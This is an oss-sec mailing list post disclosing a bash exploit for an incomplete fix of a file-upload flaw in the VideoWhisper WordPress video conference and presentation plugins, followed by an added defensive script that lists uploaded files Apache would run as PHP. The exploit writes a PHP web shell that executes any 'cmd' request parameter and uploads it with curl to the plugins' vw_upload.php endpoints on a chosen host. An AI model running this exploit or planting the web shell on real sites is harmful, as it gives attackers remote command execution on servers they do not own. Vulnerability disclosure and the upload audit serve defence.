oss-sec mailing list archives
Exploit for VideoWhisper WP plugins file upload incomplete fix.
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Sat, 18 Apr 2015 06:06:13 -0700
#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST['cmd'])){
    echo "<pre>";
    \$cmd = (\$_REQUEST['cmd']);
    system(\$cmd);
    echo "</pre>";
} else {
    echo "Please supply a command cmd";
}
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do
    echo -e ${red};
    echo -e " VideoWhisper Remote File Upload PoC Redux $NC";
    echo " 4/14/2015";
    echo " Larry W. Cashdollar, @_larry0";
    echo
    echo
    echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
    echo "SetHandler application/x-httpd-php in php5.conf";
    echo "So WP instances hosted on those OSs are still vulnerable to CVE-2014-1905";
    echo "and bid 53851.";
    echo " - Advisories -";
    echo "http://www.vapid.dhs.org/blog/04-16-2015/";
    echo "http://www.vapid.dhs.org/advisory.php?v=116";
    echo "http://www.vapid.dhs.org/advisory.php?v=117";
    echo
    echo
    echo "Ctrl ^C to exit";
    echo -n "Enter Target Hostname :";
    read target;
    echo -n "Enter 1 for integration 2 for presentation :";
    read plugin;
    echo -n "Enter payload filename or (shell.pht):";
    read file;
    echo "[+] Hostname $target";
    echo "[+] File $file";
    if [ $plugin == 1 ]; then
        echo "[+] Targeting Video Conference Plugin";
        echo
        curl --form "vw_file=@$file" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php
    else
        echo "[+] Targeting Video Presentation Plugin";
        echo
        curl --form "vw_file=@$file" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
    fi;
done
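
A defender-side check for the condition the script's banner describes (.pht and .phtml mapped to the PHP handler), added here as an example and not part of the original post: it reads the handler regexes from an Apache config file and lists the files in an upload directory that the server would run as PHP. The config contents, the directory layout and the function names are constructed for illustration.

```sh
#!/bin/sh
# Added example, not part of the original post. Audits which uploaded files
# Apache would hand to PHP, based on the server's own FilesMatch rules.

# Print every <FilesMatch> regex that CONF maps to application/x-httpd-php.
php_handler_patterns() {
    awk '
        /<FilesMatch/ { pat = $0; sub(/^[^"]*"/, "", pat); sub(/".*$/, "", pat) }
        /SetHandler[ \t]+application\/x-httpd-php[ \t]*$/ && pat != "" { print pat }
        /<\/FilesMatch>/ { pat = "" }
    ' "$1"
}

# List files under DIR whose basename matches one of those regexes.
# Apache uses PCRE; grep -E is an approximation that covers simple patterns.
php_executable_files() {
    php_handler_patterns "$1" | while IFS= read -r pat; do
        find "$2" -type f | while IFS= read -r f; do
            if printf '%s\n' "${f##*/}" | grep -Eq -- "$pat"; then
                printf '%s\n' "$f"
            fi
        done
    done | sort -u
}

# Build constructed sample data: a Debian-style PHP handler config and a
# hypothetical plugin upload directory.
make_sample() {
    mkdir -p "$1/uploads/room1"
    cat > "$1/php5.conf" <<'CONF'
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
    SetHandler application/x-httpd-php-source
</FilesMatch>
CONF
    for n in slide.jpg notes.pdf a.pht room1/b.phtml room1/c.phps room1/d.php.txt; do
        : > "$1/uploads/$n"
    done
}

tmp=$(mktemp -d)
make_sample "$tmp"
echo "Files Apache would execute as PHP:"
php_executable_files "$tmp/php5.conf" "$tmp/uploads"
rm -rf "$tmp"
```

Any file this reports inside a web-reachable upload directory deserves review; an upload filter that only rejects `.php` leaves every other extension in the printed regexes executable.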